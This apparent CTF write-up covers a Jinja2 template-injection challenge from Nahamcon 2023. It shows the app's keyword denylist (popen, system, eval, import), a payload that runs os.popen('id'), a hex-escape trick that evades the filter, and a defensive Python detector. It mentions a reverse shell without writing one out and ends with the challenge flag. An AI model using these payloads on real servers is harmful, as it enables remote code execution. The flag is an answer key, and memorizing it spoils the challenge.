Writeup for Obligatory (Web) - Nahamcon CTF (2023)
Description
Every Capture the Flag competition has to have an obligatory to-do list application, right???
Solution
Register an account and try some payloads (XSS, SSTI, SQLi) in the notes, but they all render as plain text without issues.
However, when a task is created there is a GET parameter, success, whose value is set to Task created.
Changing that value to the SSTI polyglot ${{<%[%'"}}%\ produces an error message:
HACKER DETECTED!!!!
The folowing are not allowed: [ {{\s*config\s*}},.*class.*,.*mro.*,.*import.*,.*builtins.*,.*popen.*,.*system.*,.*eval.*,.*exec.*,.*\..*,.*\[.*,.*\].*,.*\_\_.* ]
Bypasses: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#accessing-subclasses-with-bypasses
More bypasses here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2---filter-bypass
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
This one is blocked because the plain strings builtins and popen still appear in it, so let's go through it manually.
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
The denylist only inspects the raw text of the parameter, so hex escapes (or string concatenation) inside the attr() arguments bypass the filter.
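To see why the filter fails, here is the challenge's denylist re-implemented as a detection check, run over the raw parameter value and then over a normalized copy with \xNN escapes and quoted-string concatenation resolved. This is an added example, not the challenge's own code; the DENYLIST entries are copied from the error message above, and the normalization is a partial mitigation, the real fix being to pass the success value into a fixed template as a context variable instead of rendering it as template source.

```python
import re

# Denylist entries exactly as printed by the challenge's error message.
DENYLIST = [
    r"{{\s*config\s*}}", r".*class.*", r".*mro.*", r".*import.*",
    r".*builtins.*", r".*popen.*", r".*system.*", r".*eval.*", r".*exec.*",
    r".*\..*", r".*\[.*", r".*\].*", r".*\_\_.*",
]
_PATTERNS = [re.compile(p) for p in DENYLIST]

# \xNN and \uNNNN escapes inside Jinja string literals.
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
# 'abc' + 'def' style concatenation of two adjacent string literals.
_CONCAT = re.compile(r"(['\"])\s*\+\s*\1")


def blocked_by_denylist(value: str) -> list[str]:
    """Entries that match the text as-is: this is what the challenge filter sees."""
    return [p.pattern for p in _PATTERNS if p.search(value)]


def normalize(value: str) -> str:
    """Resolve escapes and literal concatenation so the checked text matches what
    Jinja will actually evaluate. Assumed helper, not part of the challenge."""
    decoded = _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)
    return _CONCAT.sub("", decoded)


def is_suspicious(value: str) -> bool:
    """Defender-side check: deny if the raw OR normalized text hits the denylist."""
    return bool(blocked_by_denylist(value) or blocked_by_denylist(normalize(value)))


if __name__ == "__main__":
    # Constructed sample values: a benign message and the two forms from the writeup.
    samples = [
        "Task created",
        "{{request|attr('application')|attr('__globals__')}}",
        "{{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')}}",
        "{{request|attr('application')|attr('\\x5f\\x5f'+'globals'+'\\x5f\\x5f')}}",
    ]
    for s in samples:
        print(f"raw hits={blocked_by_denylist(s)!r:<20} suspicious={is_suspicious(s)}  {s}")
```

The hex-escaped form yields no raw hits, which is exactly the gap the writeup exploits; only after normalization does `.*\_\_.*` fire.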
We don't get any output, so let's hex-encode a reverse shell.
Make the shell interactive.
Check the database folder.
We find the flag!
Flag: flag{7b5b91c60796488148ddf3b227735979}